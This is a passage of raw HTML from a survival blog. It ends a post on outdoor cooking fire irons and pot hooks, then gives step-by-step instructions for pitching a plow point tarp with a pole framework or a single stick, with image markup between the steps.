wp-att-3299"><img data-attachment-id="3299" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/010-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/010.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523185651&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="010" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/010.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/010.jpg?w=497" class="aligncenter size-large wp-image-3299" src="https://sensiblesurvival.files.wordpress.com/2018/04/010.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/010.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/010.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/010.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/010.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/010.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>A crane is a device that is attached to one of the uprights and can be moved up and down and swung from side-to-side.  A cook pot or a coffee pot can be placed on the crane and then the crane can be adjusted to keep the pot warm without any continued cooking.  The good news is that a crane is not really a super important part of the fire iron set, so if you don’t have one it’s really not a big deal.</p> <p>To set up fire irons you simply drive the uprights into the ground on each end of the fire pit and place the cross piece on top.  If you use a crane remember to place it on one of the uprights before you drive the upright into the ground.  I like to place the uprights out as far as possible from the ends of the fire pit so that I have a little extra room at each end of the top piece to hang my griddle, my cooking utensils, and etc.  This also leaves better access for adding more wood to your fire.<a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/011-15/" rel="attachment wp-att-3300"><img data-attachment-id="3300" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/011-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/011.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523185920&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.02&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="011" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/011.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/011.jpg?w=497" class="aligncenter size-large wp-image-3300" src="https://sensiblesurvival.files.wordpress.com/2018/04/011.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/011.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/011.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/011.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/011.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/011.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>&nbsp;</p> <p>One final item or really items that you’ll need for your fire iron set is some pot hooks.  These hooks are used to suspend cook pots from the top piece of your fire irons.  Pot hooks can be fancy black smith items, or they can simply be bent up out of ¼” round stock.<a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/012-15/" rel="attachment wp-att-3301"><img data-attachment-id="3301" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/012-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/012.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523186177&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.01&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="012" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/012.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/012.jpg?w=497" class="aligncenter size-large wp-image-3301" src="https://sensiblesurvival.files.wordpress.com/2018/04/012.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/012.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/012.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/012.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/012.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/012.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/013-15/" rel="attachment wp-att-3302"><img data-attachment-id="3302" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/013-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/013.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523186214&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.01&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="013" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/013.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/013.jpg?w=497" class="aligncenter size-large wp-image-3302" src="https://sensiblesurvival.files.wordpress.com/2018/04/013.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/013.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/013.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/013.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/013.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/013.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>&nbsp;</p> <p>Whichever kind you use be sure to get them in varying lengths so that you can adjust your pots to different heights above the fire.<a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/014-14/" rel="attachment wp-att-3303"><img data-attachment-id="3303" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/014-14/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/014.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523186316&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.02&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="014" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/014.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/014.jpg?w=497" class="aligncenter size-large wp-image-3303" src="https://sensiblesurvival.files.wordpress.com/2018/04/014.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/014.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/014.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/014.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/014.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/014.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/015-14/" rel="attachment wp-att-3304"><img data-attachment-id="3304" data-permalink="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/015-14/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/04/015.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1523186405&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.02&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="015" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/04/015.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/04/015.jpg?w=497" class="aligncenter size-large wp-image-3304" src="https://sensiblesurvival.files.wordpress.com/2018/04/015.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/04/015.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/04/015.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/04/015.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/04/015.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/04/015.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>In my next post I’ll familiarize you with the various pot, pans, utensils, and accessories used in out-door cooking.</p> <p>&nbsp;</p> <p>&nbsp;</p> </div><!--end entry--> <div class="post-footer"> <div class="comments"> <a href="https://sensiblesurvival.org/2018/04/09/outdoor-cooking-equipment/#comments">2 Comments</a> </div><!-- .comments --> </div><!--end post footer--> </div><!--end post--> <div id="post-3274" class="post-3274 post type-post status-publish format-standard hentry category-bug-out-bags-and-survival-kits tag-bug-out-tarp tag-bug-out-shelter tag-diamond-fly-tarp tag-plow-point-tarp"> <div class="post-header"> <div class="date"><a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/">November 6, 2017</a></div> <h2><a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/" rel="bookmark" title="Permanent Link to Other Set-Ups for the Plow Point&nbsp;Tarp">Other Set-Ups for the Plow Point&nbsp;Tarp</a></h2> <div class="author"> </div> </div><!--end post header--> <div class="entry clear"> <p>The Pole Framework Set-Up</p> <p>I wouldn’t waste the time or energy to do this set-up for a one night stay, but if you have a lot of materials available and if you are going to be in the same location for several nights, you may want to set up a pole framework for your tarp.</p> <p>To do this set-up you will need a ridge pole that is a little longer that the diagonal length of your tarp, and you will need a couple of forked sticks that are about six feet long.  You don’t necessarily have to have forked sticks as you should have plenty of cordage in your kit that can be used to lash together some straight sticks into a bi-pod that supports the ridge pole.  You will also need a short piece of cordage to  attach the front of the tarp (one of the cords used to tie around your kit will work for this), and you will need seven tent stakes.</p> <p>First set up the framework as pictured below.<a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/01-25/" rel="attachment wp-att-3275"><img data-attachment-id="3275" data-permalink="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/01-25/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/11/01.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1509189034&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.0125&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="01" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/11/01.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/11/01.jpg?w=497" class="aligncenter size-large wp-image-3275" src="https://sensiblesurvival.files.wordpress.com/2017/11/01.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/11/01.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/11/01.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/11/01.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/11/01.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/11/01.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Here is how you can lock the forked sticks and ridge pole together.<a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/02-24/" rel="attachment wp-att-3276"><img data-attachment-id="3276" data-permalink="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/02-24/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/11/02.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1509189084&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.02&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="02" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/11/02.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/11/02.jpg?w=497" class="aligncenter size-large wp-image-3276" src="https://sensiblesurvival.files.wordpress.com/2017/11/02.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/11/02.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/11/02.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/11/02.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/11/02.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/11/02.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Now you drape the tarp over the ridge pole and stake down the back of the tarp.<a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a02/" rel="attachment wp-att-3279"><img data-attachment-id="3279" data-permalink="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a02/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1509189282&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;160&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="a02" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=497" class="aligncenter size-large wp-image-3279" src="https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Pull the front of the tarp up and tie it off to the ridge pole and forked sticks then stake down the sides.</p> <p><a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/03-26/" rel="attachment wp-att-3277"><img data-attachment-id="3277" data-permalink="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/03-26/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/11/03.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1509188929&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="03" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/11/03.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/11/03.jpg?w=497" class="aligncenter size-large wp-image-3277" src="https://sensiblesurvival.files.wordpress.com/2017/11/03.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/11/03.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/11/03.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/11/03.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/11/03.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/11/03.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>&nbsp;</p> <p>The One Stick Set-Up</p> <p>If you are in a situation where you have very limited vegetation you can set up your tarp with only one stick.  In the example below I have pitched the tarp using only my walking stick which is about five feet long.</p> <p>In addition to the single stick you will need two of the six foot pieces of cordage from your kit and all of your tent stakes.</p> <p>First you need to stake down the back of the tarp.<a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a02/" rel="attachment wp-att-3279"><img data-attachment-id="3279" data-permalink="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a02/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1509189282&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;160&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="a02" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=497" class="aligncenter size-large wp-image-3279" src="https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/11/a02.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Then you need to attach the front of the tarp to your stick.  In this instance I used the lanyard on my walking stick and looped it through the front grommet on the tarp and then back over the walking stick.  If you use a found stick you will need to use a short piece of cordage to tie the tarp off to the stick.<a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a03/" rel="attachment wp-att-3280"><img data-attachment-id="3280" data-permalink="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a03/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/11/a03.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1509189601&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="a03" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/11/a03.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/11/a03.jpg?w=497" class="aligncenter size-large wp-image-3280" src="https://sensiblesurvival.files.wordpress.com/2017/11/a03.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/11/a03.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/11/a03.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/11/a03.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/11/a03.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/11/a03.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a04/" rel="attachment wp-att-3281"><img data-attachment-id="3281" data-permalink="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a04/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/11/a04.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1509189614&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;12.85&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.0125&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="a04" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/11/a04.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/11/a04.jpg?w=497" class="aligncenter size-large wp-image-3281" src="https://sensiblesurvival.files.wordpress.com/2017/11/a04.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/11/a04.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/11/a04.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/11/a04.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/11/a04.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/11/a04.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Now pull the tarp forward to tighten up the ridge line and attach your two, six foot pieces of cordage to the top of the stick.<a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a05/" rel="attachment wp-att-3282"><img data-attachment-id="3282" data-permalink="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a05/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/11/a05.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1509190199&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="a05" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/11/a05.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/11/a05.jpg?w=497" class="aligncenter size-large wp-image-3282" src="https://sensiblesurvival.files.wordpress.com/2017/11/a05.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/11/a05.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/11/a05.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/11/a05.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/11/a05.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/11/a05.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>This next step is easier to do if you have two people so that one person can keep the stick in place while the other person sets the tent stakes, but you can do it alone as I did in this instance.  So, what you do is drive in a couple of tent stakes that are about 45 degrees on each side of the stick.  The stakes need to be about four feet out from the stick. <a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a06/" rel="attachment wp-att-3283"><img data-attachment-id="3283" data-permalink="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a06/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/11/a06.jpg" data-orig-size="2133,1443" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1509190188&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="a06" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/11/a06.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/11/a06.jpg?w=497" class="aligncenter size-large wp-image-3283" src="https://sensiblesurvival.files.wordpress.com/2017/11/a06.jpg?w=497&#038;h=336" alt="" width="497" height="336" srcset="https://sensiblesurvival.files.wordpress.com/2017/11/a06.jpg?w=497&amp;h=336 497w, https://sensiblesurvival.files.wordpress.com/2017/11/a06.jpg?w=994&amp;h=672 994w, https://sensiblesurvival.files.wordpress.com/2017/11/a06.jpg?w=150&amp;h=101 150w, https://sensiblesurvival.files.wordpress.com/2017/11/a06.jpg?w=300&amp;h=203 300w, https://sensiblesurvival.files.wordpress.com/2017/11/a06.jpg?w=768&amp;h=520 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Tie off your guy lines to the stakes to hold the stick upright.  Make sure that the ridge line of your tarp is tight.  Use your remaining tent stakes to stake out the sides of the tarp and you’re done.</p> <p><a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a07/" rel="attachment wp-att-3284"><img 